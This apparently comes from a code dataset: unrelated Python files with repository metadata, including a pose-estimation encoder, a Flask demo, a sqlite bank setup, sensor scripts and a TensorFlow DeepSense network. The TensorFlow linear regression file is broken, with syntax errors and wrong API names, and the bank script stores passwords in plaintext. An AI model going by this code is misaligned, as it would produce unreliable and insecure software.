def __init__(self, max_num_people, num_parts, keep_invis):
self.max_num_people = max_num_people
self.num_parts = num_parts
self.keep_invis = keep_invis
def __call__(self, keypoints, output_res):
visible_nodes = np.zeros((self.max_num_people, self.num_parts, 2))
visible_weight = np.zeros_like(visible_nodes)
for i in range(len(keypoints)):
tot = 0
for idx, pt in enumerate(keypoints[i]):
x, y = int(pt[0]), int(pt[1])
if (self.keep_invis and pt[2] == 0.0) or ( (not self.keep_invis) and pt[2] == 2.0):
continue
if x>=0 and y>=0 and x<output_res[0] and y<output_res[1]:
visible_nodes[i][tot] = (idx * output_res[0] * output_res[1] + y * output_res[1] + x, 1)
visible_weight[i, tot, :] = 1.0
tot += 1
return visible_nodes, visible_weight
class Encoder(object):
"""Label to target transform for Associative Embedding task
Parameter
---------
input_size : tuple, [h, w]
input size
target_size : tuple, [h, w]
target size
num_keypoint : int
keypoint sum
gauss_sigma: float
gaussian sigma
max_num_people: int
max people num in one image, default is 30
"""
def __init__(self, input_size, target_size, num_keypoint, gauss_sigma, max_num_people=30, keep_invis=True):
self.input_size = input_size
self.target_size = target_size
self.stride = input_size[0] // target_size[0]
self.num_keypoint = num_keypoint
self.guass_sigma = gauss_sigma
self.keep_invis = keep_invis
self.generateHeatmap = GenerateHeatmap(num_keypoint, gauss_sigma, keep_invis, output_res=target_size)
self.keypointsRef = KeypointsRef(max_num_people, num_keypoint, keep_invis)
def __call__(self, keypoints):
"""convert label to target
"""
keypoints = keypoints.reshape(-1, self.num_keypoint, 3)
keypoints[:, :, :2] /= self.stride
heatmap, heatmap_weight = self.generateHeatmap(keypoints)
ref, ref_weight = self.keypointsRef(keypoints, self.target_size)
return heatmap, heatmap_weight, ref, ref_weight
class Decoder(object):
"""Target to predict transform for Associative Embedding task
"""
def __init__(self):
pass
def __call__(self):
"""convert target to predict
"""
pass
| [
"min.du@horizon.ai"
] | min.du@horizon.ai |
cdb2b31f8a4c2e0d5d6375db41784375b733313b | fe813d91aa9e7ca6a68992419b9a10fe3042fbfc | /2.control_flow/continueStatements.py | 268885a1339b82019764b277b5b6ed30681b4b48 | [] | no_license | helmigandi/belajar-python | 90ba217431792de5c56f585b478b06aa5c8604e0 | 068cfef94f1e996a87e0d58da6fe4b762bc7d9c0 | refs/heads/master | 2022-03-11T08:53:02.739725 | 2019-11-28T10:43:34 | 2019-11-28T10:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | # The continue statement, also borrowed from C,
# continues with the next iteration of the loop:
for num in range(2, 10):
if num % 2 == 0:
print("Found an even number", num)
continue
print("Found a number", num)
# Found an even number 2
# Found a number 3
# Found an even number 4
# Found a number 5
# Found an even number 6
# Found a number 7
# Found an even number 8
# Found a number 9
print("=================================")
while True:
print('Who are you?')
name = input()
if name != 'Joe':
# print("You are not Joe")
continue
print('Hello, Joe. What is the password? (It is a fish.)')
password = input()
if password == 'swordfish':
break
print('Access granted.')
# Who are you?
# andi
# Who are you?
# Joe
# Hello, Joe. What is the password? (It is a fish.)
# fish
# Who are you?
# Joe
# Hello, Joe. What is the password? (It is a fish.)
# swordfish
# Access granted. | [
"sugandihelmi@gmail.com"
] | sugandihelmi@gmail.com |
ee6503afdf41e84a97286eeb85e6c01d02098750 | 17084c0f57095ea6cd7ce242b16ec9d8cd18442c | /__init__.py | 69b736e1133ccf7aa1a1ebc489368519e8082113 | [] | no_license | zishan0215/simple_banking_program | 1fc096a3c489ebe80b4fd73125e88b017e10b8d4 | e13f2420d3e55c0875b48aa354da963873c8dbc3 | refs/heads/master | 2021-05-28T23:18:30.021411 | 2014-06-30T15:02:18 | 2014-06-30T15:02:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,437 | py | import sqlite3
if __name__ == '__main__':
con = sqlite3.connect('bank_data.db')
con.execute('''
CREATE TABLE bank (id INT(11) PRIMARY KEY,
name VARCHAR(40) NOT NULL, location VARCHAR(40) NOT NULL, capital
DOUBLE NOT NULL, customers INT(11), employees INT(11));
''')
con.execute('''
CREATE TABLE customers(id INT(11) NOT NULL,
name VARCHAR(40) NOT NULL, password VARCHAR(40), balance DOUBLE,
loans INT(11), account_number INT(11) PRIMARY KEY NOT NULL, credit_card_number INT(11));
''')
con.execute('''
CREATE TABLE employees(id INT(11) PRIMARY KEY NOT NULL,
name VARCHAR(40), password VARCHAR(40), salary DOUBLE,
position VARCHAR(40), location VARCHAR(40));
''')
con.commit()
con.execute('''
INSERT INTO bank(id, name, location, capital, customers, employees)
VALUES (1,'The Python Bank', 'Toshiba Satellite', 10000000,
0, 1);
''')
con.execute('''
INSERT INTO employees(id, name, password, salary,
position, location) VALUES (1, 'Zishan',
'Zishan2', 100000, 'CEO', 'Toshiba Satellite');
''')
con.commit()
con.close()
| [
"zishanahmad@outlook.com"
] | zishanahmad@outlook.com |
9ab213f1250f7ee72910eff49250c80c7409c0f6 | 50258fa1da842ed44ebd53d612a530424dc35ff2 | /Clones/Project/24.1.1_UltrasonicRanging/UltrasonicRanging_1.py | 827c7d2274576e87bd187ff8aa74c72f9ec43699 | [] | no_license | bnnk/PyKit-Project | 26230d2d2c58972a2423ed1f2d4478f92f93629d | fac511c342b2b844e7843f4aeb90b1cbc3d50cf4 | refs/heads/master | 2020-05-20T19:54:35.343331 | 2019-05-13T15:14:59 | 2019-05-13T15:14:59 | 185,733,381 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,206 | py | #!/usr/bin/env python3
########################################################################
# Filename : UltrasonicRanging.py
# Description : Get distance from UltrasonicRanging.
# Author : freenove
# modification: 2018/08/03
########################################################################
import RPi.GPIO as GPIO
import time
trigPin = 16
echoPin = 18
MAX_DISTANCE = 220 #define the maximum measured distance
timeOut = MAX_DISTANCE*60 #calculate timeout according to the maximum measured distance
def pulseIn(pin,level,timeOut): # function pulseIn: obtain pulse time of a pin
t0 = time.time()
while(GPIO.input(pin) != level):
if((time.time() - t0) > timeOut*0.000001):
return 0;
t0 = time.time()
while(GPIO.input(pin) == level):
if((time.time() - t0) > timeOut*0.000001):
return 0;
pulseTime = (time.time() - t0)*1000000
return pulseTime
def getSonar(): #get the measurement results of ultrasonic module,with unit: cm
GPIO.output(trigPin,GPIO.HIGH) #make trigPin send 10us high level
time.sleep(0.00001) #10us
GPIO.output(trigPin,GPIO.LOW)
pingTime = pulseIn(echoPin,GPIO.HIGH,timeOut) #read plus time of echoPin
distance = pingTime * 340.0 / 2.0 / 10000.0 # the sound speed is 340m/s, and calculate distance
return distance
def setup():
print ('Program is starting...')
GPIO.setmode(GPIO.BOARD) #numbers GPIOs by physical location
GPIO.setup(trigPin, GPIO.OUT) #
GPIO.setup(echoPin, GPIO.IN) #
def loop():
GPIO.setup(11,GPIO.IN)
while(True):
distance = getSonar()
if (distance > 50):
print ("Buddy You are Far ...")
elif ((distance < 50) and (distance > 20)):
print ("Buddy You are Near ...")
else:
print ("Buddy You are Very Near ...")
#print ("The distance is : %.2f cm"%(distance))
time.sleep(1)
if __name__ == '__main__': #program start from here
setup()
try:
loop()
except KeyboardInterrupt: #when 'Ctrl+C' is pressed, the program will exit
GPIO.cleanup() #release resource
| [
"root@projects@caramelinux.com"
] | root@projects@caramelinux.com |
b9b49b32098120d98e1c3780520463075447b77e | 61658c8225fc0a55ec96634fba9f90d382bd7292 | /deep_Q_trader/deepSense.py | 7134510c2390e433c00ee55f7225f4fdef775df6 | [] | no_license | chpark17/rips_realai | 03eb45fb389cbd47d222b0c64e457385f207879f | 2c2c7815997d4d87dbc2a960cfb1764560716ea8 | refs/heads/master | 2020-03-22T02:51:46.295029 | 2018-11-05T17:35:07 | 2018-11-05T17:35:07 | 139,397,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,451 | py | '''
This file build the DeepSense network (unified deep learning network for timeseries data).
more info: https://arxiv.org/abs/1611.01942
'''
from os.path import join
import tensorflow as tf
from constants import *
class DropoutKeepProbs:
'''Defines the keep probabilities for different dropout layers'''
def __init__(self, conv_keep_prob=1.0, dense_keep_prob=1.0, gru_keep_prob=1.0):
self.conv_keep_prob = conv_keep_prob
self.dense_keep_prob = dense_keep_prob
self.gru_keep_prob = gru_keep_prob
class DeepSenseParams:
'''Defines the parameters for the DeepSense Q Network Architecture'''
def __init__(self, dropoutkeeprobs = None):
#Timeseries Parameters
self.num_actions = NUM_ACTIONS
self.num_channels = NUM_CHANNELS
self.split_size = SPLIT_SIZE
self.window_size = WINDOW_SIZE
#Dropout Layer Parameters
self._dropoutkeeprobs = dropoutkeeprobs
#Convolutional Layer Parameters
self.filter_sizes = FILTER_SIZES # a list with length 2
self.kernel_sizes = KERNEL_SIZES # a list with length 2
self.padding = PADDING
#GRU Parameters
self.gru_cell_size = GRU_CELL_SIZE
self.gru_num_cells = GRU_NUM_CELLS
#FullyConnected Network Parameters
self.dense_layer_sizes = DENSE_LAYER_SIZES
@property
def dropoutkeepprobs(self):
return self._dropoutkeeprobs
@dropoutkeepprobs.setter
def dropoutkeepprobs(self, value):
self._dropoutkeeprobs = value
class DeepSense:
'''DeepSense Architecture for Q function approximation over Timeseries'''
def __init__(self, deepsenseparams, logger, sess, name='DeepSense'):
self.params = deepsenseparams
self.logger = logger
self.sess = sess
self.__name__ = name
self._weights = None
@property
def action(self):
return self._action
@property
def avg_q_summary(self):
return self._avg_q_summary
@property
def params(self):
return self._params
@params.setter
def params(self, value):
self._params = value
@property
def name(self):
return self.__name__
@property
def values(self):
return self._values
@property
def weights(self):
if self._weights is None:
self._weights = {}
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,
scope=self.__name__)
for variable in variables:
name = "/".join(variable.name.split('/')[1:])
self._weights[name] = variable
return self._weights
def conv2d_layer(self, inputs, filter_size, kernel_size, padding, name, reuse, activation=None):
return tf.layers.conv2d(
inputs=inputs,
filters=filter_size, # an int, number of filters. i.e. the size of outputs
kernel_size=[1, kernel_size], # filter (window) size with the first dimention fixed to 1
strides=(1, 1), # move the filter by 1 each time
padding=padding, # a string, "valid" or "same" (case-insensitive)
activation=activation, # activation function
name=name, # a string
reuse=reuse # a boolean, whether to reuse the weights of a previous layer by the same name
)
def dense_layer(self, inputs, num_units, name, reuse, activation=None):
output = tf.layers.dense(
inputs=inputs,
units=num_units, # an int or long, the size of outputs
activation=activation,
name=name,
reuse=reuse
)
return output
# ignore units during the training phase of certain set of neurons which is chosen at random
# At each training stage, individual nodes are either dropped out of the net with probability 1-p or kept with probability p
# to prevent over-fitting
def dropout_layer(self, inputs, keep_prob, name, is_conv=False):
if is_conv:
channels = tf.shape(inputs)[-1] # the last enrty of the input shape is the number of channels
return tf.nn.dropout(
x = inputs, # a floating point tensor
keep_prob=keep_prob, # a scalar Tensor with the same type as x. The probability that each element is kept.
name=name,
noise_shape=[
self.batch_size, 1, 1, channels
] # A 1-D Tensor of type int32, representing the shape for randomly generated keep/drop flags.
)
else:
return tf.nn.dropout(
inputs,
keep_prob=keep_prob,
name=name
)
def build_model(self, state, reuse = False): # reuse's default value changed from false to ture (!)
inputs = state[0] # size of state[0]: [batch_size, history_length, num_channels]
trade_rem = state[1] # shape of state[1]: [batch_size,]
with tf.variable_scope(self.__name__, reuse=reuse):
with tf.name_scope('phase'): # create a new variable named 'phase' in the computational graph
self.phase = tf.placeholder(dtype=tf.bool) # fed with boolean inputs (in any shape) and output a tensor
with tf.variable_scope('input_params', reuse=reuse): # create a new variable named 'input_params' in the computational graph
self.batch_size = tf.shape(inputs)[0] # the length of the inputs, not fixed
# step 0: reshape the inputs
inputs = tf.reshape(inputs,
shape=[self.batch_size,
self.params.split_size,
self.params.window_size, # history_length = split_size*window_size
self.params.num_channels]) # shape of a single input: [split_size,window_size,num_channels]
with tf.variable_scope('conv_layers', reuse=reuse): # create a new variable named 'conv_layers' in the computational graph
window_size = self.params.window_size
num_convs = len(self.params.filter_sizes)
for i in range(0, num_convs): # create num_convs convolutional layers in the computational graph
with tf.variable_scope('conv_layer_{}'.format(i + 1), reuse=reuse):
window_size = window_size - self.params.kernel_sizes[i] + 1
# feed the inputs to a convolutional layer
inputs = self.conv2d_layer(inputs, self.params.filter_sizes[i],
self.params.kernel_sizes[i],
self.params.padding,
'conv_{}'.format(i + 1),
reuse,
activation=tf.nn.relu)
# feed the output of the previous convolutional layer to a dropout layer
inputs = self.dropout_layer(inputs,
self.params.dropoutkeepprobs.conv_keep_prob,
'dropout_conv_{}'.format(i + 1),
is_conv=True)
if self.params.padding == 'VALID':
inputs = tf.reshape(inputs,
shape=[
self.batch_size,
self.params.split_size,
window_size * self.params.filter_sizes[-1]
]
)
else:
inputs = tf.reshape(inputs,
shape=[
self.batch_size,
self.params.split_size,
self.params.window_size * self.params.filter_sizes[-1]
]
)
# GRUs: Gated recurrent units, do not have an output gate
# similar to LSTM: long short-term memory, have an output gate
gru_cells = [] # create a list of gru cells, with a length of (gru_num_cells-1)
for i in range(0, self.params.gru_num_cells):
cell = tf.nn.rnn_cell.GRUCell( # do not have an output gate
num_units=self.params.gru_cell_size, # size of output of one cell
reuse=reuse # whether to reuse variables in an existing scope
)
# details: https://arxiv.org/abs/1512.05287
# Create a cell with added input, state, and output dropout
# State dropout is performed on the outgoing states of the cell
cell = tf.nn.rnn_cell.DropoutWrapper(
cell,
output_keep_prob=self.params.dropoutkeepprobs.gru_keep_prob,
variational_recurrent=True, # the same dropout mask is applied at every step (input, state, and output)
dtype=tf.float32 # The dtype of the input, state, and output tensors. Required and used iff variational_recurrent = True
)
gru_cells.append(cell)
# Create a RNN cell composed sequentially of a number of RNNCells
# accepted and returned states are n-tuples, where n = len(cells) = gru_num_cells
multicell = tf.nn.rnn_cell.MultiRNNCell(cells = gru_cells)
# create a RNN layer named 'dynamic_unrolling' in the computational graph
with tf.name_scope('dynamic_unrolling'):
# Creates a recurrent neural network specified by 'cell'
output, final_state = tf.nn.dynamic_rnn(
cell=multicell,
inputs=inputs,
dtype=tf.float32
)
# shape of the output: [batch_size, gru_cell_size, gru_num_cells]
# the outputs of the last RNN state in the order of the gru cells
output = tf.unstack(output, axis=1)[-1]
# only take the last output tensor
# shape of the output tensor: [batch_size, gru_num_cells]
'''
Append the information regarding the number of trades left in the episode
'''
# trade_rem = state[1]: trades remaining in the episode
trade_rem = tf.expand_dims(trade_rem, axis=1)
# shape of trade_rem: [batch_szie, 1] ?
output = tf.concat([output, trade_rem], axis=1)
# shape of the output: [batch_size, gru_num_cells + 1] ?
# create a new set of layers named 'fully_connected' in the computational graph
with tf.variable_scope('fully_connected', reuse=reuse):
num_dense_layers = len(self.params.dense_layer_sizes)
for i in range(0, num_dense_layers):
with tf.variable_scope('dense_layer_{}'.format(i + 1), reuse=reuse):
# create a new layer with 1 dense layer and 1 dropout layer
output = self.dense_layer(output, self.params.dense_layer_sizes[i],
'dense_{}'.format(i + 1), reuse, activation=tf.nn.relu)
output = self.dropout_layer(output,
self.params.dropoutkeepprobs.dense_keep_prob,
'dropout_dense_{}'.format(i + 1))
# the output layer
self._values = self.dense_layer(output, self.params.num_actions, 'q_values', reuse)
# shape of the output: [batch_size, num_actions]
with tf.name_scope('avg_q_summary'):
# compute the average among the Q values of each data
avg_q = tf.reduce_mean(self._values, axis=0)
self._avg_q_summary = []
for idx in range(self.params.num_actions):
self._avg_q_summary.append(tf.summary.histogram('q/{}'.format(idx), avg_q[idx]))
self._avg_q_summary = tf.summary.merge(self._avg_q_summary, name='avg_q_summary')
# Returns the index with the largest value across dimensions of a tensor
self._action = tf.argmax(self._values, dimension=1, name='action')
# a 1d list with length batch_size
| [
"noreply@github.com"
] | chpark17.noreply@github.com |
be03e65bb1bd8709380574f85dccabf81c26111e | 70626b98af60711d90b123b6794d865aa18188c2 | /bin/salt-ec2 | 95ca4f247ee1570a02ae3d18ae948eedc440c04b | [] | no_license | svanderbleek/salt-ec2 | 0baaac6e901c6b19023207f3b36c6b750fb5c7e6 | 334c159e675dc51f24940bde4e6ebfc3b626151a | refs/heads/master | 2021-01-20T02:47:50.053971 | 2014-05-06T05:42:55 | 2014-05-06T05:42:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/usr/bin/env python3
import sys
print(sys.path)
from optparse import OptionParser
from list import list
COMMAND = 0
LIST = 'list'
parser = OptionParser()
options, arguments = parser.parse_args()
if arguments[COMMAND] == LIST:
print(list())
| [
"sandy.vanderbleek@gmail.com"
] | sandy.vanderbleek@gmail.com | |
8180fbd10f5256573414b21160903a875eff5713 | 460e0437f27d907a176db5cd48747fd81641e5d2 | /blog/blog_main/migrations/0007_auto_20180311_0950.py | 9db0bee0d0e59548562e904b571d4d8a143da862 | [] | no_license | lmishra92/trial-blog | 0204093174854b8fd7eb4b7c871ead5628ae9389 | 958495518965ac74aeb38d4736784daf847269a9 | refs/heads/master | 2020-03-08T19:52:20.257696 | 2018-04-06T08:14:10 | 2018-04-06T08:14:10 | 128,366,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | # Generated by Django 2.0.3 on 2018-03-11 09:50
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog_main', '0006_auto_20180311_0941'),
]
operations = [
migrations.AlterField(
model_name='post',
name='publish',
field=models.DateTimeField(default=datetime.datetime(2018, 3, 11, 9, 49, 41, 910480, tzinfo=utc)),
),
]
| [
"leninmishra@Lenins-MacBook-Pro.local"
] | leninmishra@Lenins-MacBook-Pro.local |
91e4edc5e3f39d47b5755501b164a77c38a958c6 | 4f5992128863f14cde2fb288b565f5876a93ed74 | /Linearregression.py | d62f82f36da7f794a60995b644d1bc04e6ab35cf | [] | no_license | SAdiA259/TensorFlow-sales-price-prediction | 1e077d9e202f8ac01dfc33eafea2585934003a79 | 566decb7d711b5d324b2be70935c835201fa8bd7 | refs/heads/master | 2020-04-02T18:07:55.576118 | 2018-10-25T14:43:51 | 2018-10-25T14:43:51 | 154,687,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,847 | py | ## linear regression
## housing pricing based on square footage and price
import tensorflow as tf
import numpy as np
#########################
def inference(x):
W=tf.variable(tf.zeros([1,1])
b=tf.variable(tf.zeros([1])) #we only have X1 so only w1
y=tf.matmul(W, x) + b
return y
############################
def loss(y,y_):
cost=tf.reduce_sum(tf.pow( (y_ - y), 2 ))
return cost
#############################
def training():
train_step=tf.train.GradeintDescentOptimizer(0.00001).minimize(cost) ## minimize cost
return train_step
###############################
def evaluate(y,y_):
correct_prediction=y
float_val=tf.cast(correct_prediction, tf.float32) ###3converting to float
return float_val
#################################
##y=w1x1+b
x=tf.placeholder(tf.float32, [None,1]) ##only square footage
y_=tf.placeholder(tf.float32, [None,1]) #actual
y= inference(x) # predicted one with x =data
cost=loss(y, y_) #compare real and pedicted
train_step=training(cost)
eval_op=evaluate(y,y_)
#####################################
init=tf.initialize_all_variables()
sess=tf.session()
session.run(init) ### all variables get initialized
######################################33333
###training model
steps=100
for i in range(steps):
xs=np.array([[i]]) ## house size
ys=np.array([[5*i]]) ## house price 5 times house size
feed ={x:xs, y_:ys}
sess.run(train_step, feed_dict=feed)
##################################3
### testing model
for i in range(100,200):
xs_test=np.array([[i]]) ## house price
ys_test=np.array([[2*i]]) ## if testing correctly it should predict 500 - 1000
feed_test={x:xs_test, y_:ys_test}
result=sess.run(eval_op, feed_dict = feed_test)
print "Run {},{}".format(i, result)
r=raw_input
| [
"noreply@github.com"
] | SAdiA259.noreply@github.com |
f9fc3d814e724c65a64fff06d24280e15556de5e | 296fbb93183c61bf67731237db84969717333dff | /app/auth/email.py | dfda10f6a108ed645f60dfee4dbbf07b51d867b3 | [] | no_license | LeviFriley/melly | 5df0cb517e3797df0dd04858c900ea8fa5fef78b | d005dae71b5d9f5bbcfbc64f67572c720ac23d70 | refs/heads/master | 2020-04-12T00:47:23.301364 | 2018-12-18T01:31:49 | 2018-12-18T01:31:49 | 162,212,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | from flask import render_template, current_app
from app.email import send_email
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token)) | [
"JMILLER@ad.hc-sc.gc.ca"
] | JMILLER@ad.hc-sc.gc.ca |
183ff6a161b4d65edd2fa062a2d549ba9b3d089f | 6d8e97eda1aa4d64f38f4812ed49785b54db1108 | /P3LAB_ Brower.py | 4cef93d98fc070a25766ecf8a5241ae1aad54534 | [] | no_license | browerd0686/CTI110 | 7f5c457f86576a67841538515cfd8de49538adb3 | 26d46d36c70d9e67aa4079733001c706c77eb097 | refs/heads/master | 2020-06-09T08:52:40.027427 | 2019-07-18T04:51:29 | 2019-07-18T04:51:29 | 193,412,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | #CTI-110
#P3HW2-MealTipTax
#Darrius Brower
#July 1, 2019
def main():
# This program takes a number grade and outputs a letter grade.
# system uses 10-point grading scale
A_score = 90
B_score = 80
C_score = 70
D_score = 60
score = int(input('Enter grade: '))
if score >= A_score:
print('Your grade is: A')
else:
if score >= B_score:
print('Your grade is: B')
else:
if score >= C_score:
print('Your grade is: C')
else:
if score >= D_score:
print('Your grade is: D')
else:
print('Your grade is: F')
# program start
main()
| [
"noreply@github.com"
] | browerd0686.noreply@github.com |
23dc496b373f870ec52009d414579d71d99fa082 | 8807958eab34f289cc8b1b07e180af757bde7124 | /design2/test_LineClassifier.py | 75cb3a10fcec6095c64c62655aa304d8f43531da | [
"BSD-2-Clause"
] | permissive | davidjamesbeck/IJAL-interlinear | 4f34cbb8626403f7bc52db96f0349d10ca2ce674 | cb5dbb1d6aea98cce76668aa868a9189f31baf3f | refs/heads/master | 2020-03-30T11:00:46.001171 | 2018-10-01T13:50:02 | 2018-10-01T13:50:02 | 151,148,840 | 0 | 0 | BSD-2-Clause | 2018-10-01T19:45:38 | 2018-10-01T19:45:37 | null | UTF-8 | Python | false | false | 3,028 | py | import re
import sys
import unittest
from Line import *
from LineClassifier import *
import importlib
pd.set_option('display.width', 1000)
import pdb
def runTests():
test_recognizeDegenerateLine()
test_recognizeCanonicalLine()
test_recognizeWordsAsElementsLine()
test_MonkeyAndThunder_allLinesRecognized()
test_LOKONO_allLinesRecognized()
def test_recognizeDegenerateLine():
"""
MonkeyAndThunder starts off with a few introductory lines in Spanish, with English translation.
No words, no glosses, just a line with time slots, and one child
"""
print("--- test_recognizeDegenerateLine")
filename = "../testData/monkeyAndThunder/AYA1_MonkeyandThunder.eaf"
xmlDoc = etree.parse(filename)
x0 = Line(xmlDoc, 0)
assert(x0.getTierCount() == 2)
classifier = LineClassifier(x0.getTable())
assert(classifier.run() == "DegenerateLine")
def test_recognizeCanonicalLine():
"""
MonkeyAndThunder line 6 fits the canonical form:
1) a time line
"""
print("--- test_recognizeCanonicalLine")
filename = "../testData/monkeyAndThunder/AYA1_MonkeyandThunder.eaf"
xmlDoc = etree.parse(filename)
x = Line(xmlDoc, 6)
assert(x.getTierCount() == 4)
classifier = LineClassifier(x.getTable())
assert(classifier.run() == "CanonicalLine")
def test_recognizeWordsAsElementsLine():
"""
LOKONO has the canonical spokenText tier, its translation, but each word in the
spokenText is its own element, each with two children: morpheme and gloss
"""
print("--- test_recognizeWordsAsElementsLine")
filename = "../testData/LOKONO_IJAL_2.eaf"
xmlDoc = etree.parse(filename)
x = Line(xmlDoc, 1)
# print(x.getTable())
assert(x.getTierCount() == 20)
classifier = LineClassifier(x.getTable())
assert(classifier.run() == "WordsAsElementsLine")
def test_MonkeyAndThunder_allLinesRecognized():
print("--- test_MonkeyAndThunder_allLinesRecognized")
filename = "../testData/monkeyAndThunder/AYA1_MonkeyandThunder.eaf"
xmlDoc = etree.parse(filename)
lineCount = len(xmlDoc.findall("TIER/ANNOTATION/ALIGNABLE_ANNOTATION"))
assert(lineCount == 41)
for i in range(lineCount):
x = Line(xmlDoc, i)
classifier = LineClassifier(x.getTable())
classification = classifier.run()
#print("%d: %s" % (i, classification))
assert(classification in ["DegenerateLine", "CanonicalLine"])
def test_LOKONO_allLinesRecognized():
print("--- test_LOKONO_allLinesRecognized")
filename = "../testData/LOKONO_IJAL_2.eaf"
xmlDoc = etree.parse(filename)
lineCount = len(xmlDoc.findall("TIER/ANNOTATION/ALIGNABLE_ANNOTATION"))
assert(lineCount == 344)
for i in range(lineCount):
x = Line(xmlDoc, i)
classifier = LineClassifier(x.getTable())
classification = classifier.run()
#print("%d: %s" % (i, classification))
assert(classification in ["WordsAsElementsLine"])
#x = Line(xmlDoc, 28)
#x.getTable()
| [
"paul.thurmond.shannon@gmail.com"
] | paul.thurmond.shannon@gmail.com |
f82142f8ab4d086608ecc4d6aacb5d1a406d734f | 82876a61eea81cff32645c1710b782f517ce5e39 | /web_flask/6-number_odd_or_even.py | ba38024d292c8da1559824b9993e033dba02bd19 | [] | no_license | fabo893/AirBnB_clone_v2 | 40f0b98b3adf9d30f2e4463e7cf6d98c9ba570a8 | 4291a545f5000634fb5cb869622fc5304cb16a07 | refs/heads/master | 2023-04-30T14:04:47.988445 | 2021-05-06T04:03:54 | 2021-05-06T04:03:54 | 352,668,747 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | #!/usr/bin/python3
"""
Hello Flask!
"""
from flask import Flask
from flask import render_template
app = Flask(__name__)
app.url_map.strict_slashes = False
@app.route('/')
def hello():
""" Hello method """
return "Hello HBNB!"
@app.route('/hbnb')
def hello123():
""" Second hello method """
return "HBNB"
@app.route('/c/<text>')
def cprint(text):
""" Display C with text """
text = text.replace("_", " ")
return "C {}".format(text)
@app.route('/python/', defaults={'text': 'is cool'})
@app.route('/python/<text>')
def pythonprint(text):
""" Display Python with text """
if len(text) > 0:
text = text.replace("_", " ")
return "Python {}".format(text)
@app.route('/number/<int:n>')
def number(n):
return "{} is a number".format(n)
@app.route('/number_template/<int:n>')
def html(n):
""" If is number display HTML """
return render_template('5-number.html', n=n)
@app.route('/number_odd_or_even/<int:n>')
def noddeven(n):
""" If is number display HTML """
return render_template('6-number_odd_or_even.html', n=n)
if __name__ == "__main__":
app.run(debug=True)
| [
"jose.rosa893@gmail.com"
] | jose.rosa893@gmail.com |
c8993094f9d2a2dc0b4efbab9bd24ba07604c836 | 100b1c92f183f73587333e47b8f9b81549af506c | /py/9-bsk-vol.py | 4eef3170a9fd0f1b2a2a034359c914adcb33528c | [] | no_license | jacob-vintercapital/finplot | 0f437036c0ed0df9a7753cbe0b4145af0af2e229 | dbfc7b04e6af020b5b215df82ed22591dda0062d | refs/heads/master | 2020-04-13T00:54:24.367982 | 2019-01-05T09:08:01 | 2019-01-05T09:08:01 | 162,857,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | # volume over time
vol_bsk_mat = pd.concat([v1, v2,v3,v4,v5,v6,v7,v8,v9], axis=1)
vol_bsk_mat.mean()
vol_bsk_mat.std()
# probably not so much interesting to analyze here. | [
"jacob@vinter.capital"
] | jacob@vinter.capital |
336596f8b1107bad9b40d7d8cfeca12511d7e557 | 786b1022d40f380b1122bcc6643e68c7cbfc9a4a | /healthcarebooking/models/association_company_profile.py | cfee8754a049b4ebb973fa6b0e857a3184476117 | [] | no_license | pvnguyen123/healthcare-booking | 73440a872eaf4506a0c77f51b533d38ff6088a21 | 35d567b3b778b56baf669c20abeb5ba375e98fbf | refs/heads/master | 2020-03-28T19:06:04.118346 | 2019-04-28T20:15:10 | 2019-04-28T20:15:10 | 148,944,143 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | from healthcarebooking.extensions import db
from sqlalchemy import ForeignKey, Column, Integer, Enum
class AssociationCompanyProfile(db.Model):
""" Basic company and profile assosiaction
"""
__tablename__ = 'association_company_profile'
company_id = Column(Integer, ForeignKey('company.id'), primary_key=True)
profile_id = Column(Integer, ForeignKey('profile.id'), primary_key=True)
association_type = Column(Enum('admin', 'member', 'client', 'provider'))
def __repr__(self):
return f'<AssociationCompanyProfile company {self.company_id}: profile {self.profile_id}>'
| [
"hpnguyen@hpnguyen-mn2.linkedin.biz"
] | hpnguyen@hpnguyen-mn2.linkedin.biz |
463a1280db30c028900eec59f794147f96e50fbb | 680d3da3e38bb97282a3a26822a24f336874ad69 | /Generators/fibb.py | 83eb7ec4bf9cc9fa141d50eb0d224b9c871d9deb | [] | no_license | sinhasaroj/Python_programs | 9384efef26ce4e1b1e04d8725e8826120b66640a | e89148acbe852776993912e8e01b2cdc5f5bcb4c | refs/heads/master | 2023-06-14T00:17:27.354045 | 2021-06-30T19:28:52 | 2021-06-30T19:28:52 | 338,111,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | def fib_gen():
a,b = 0 ,1
while True:
yield a
a,b = b , a+b
g = fib_gen()
for x in g:
if x<10:
print(x)
else:
break
| [
"saroj.sinha@hpe.com"
] | saroj.sinha@hpe.com |
f3400af8343d019f8d5a1257bf176ef20d2d7882 | 97d85e2958de5b413202f89154f564f7c8994b83 | /springmesh/render/__init__.py | 8b04ed234af4d9c161276e2d0f67a9b01ee98f84 | [] | no_license | afcarl/pyspringmesh | ea25a943bf1e7384e888c5dc51386a03c5c9435f | 08da6bf9ca3a989829e07a190b9a34c487b0a0d3 | refs/heads/master | 2020-03-16T23:25:49.064570 | 2016-08-23T19:45:58 | 2016-08-23T19:45:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | #!/usr/bin/env python
from . import mpl
__all__ = ['mpl']
| [
"brettgraham@gmail.com"
] | brettgraham@gmail.com |
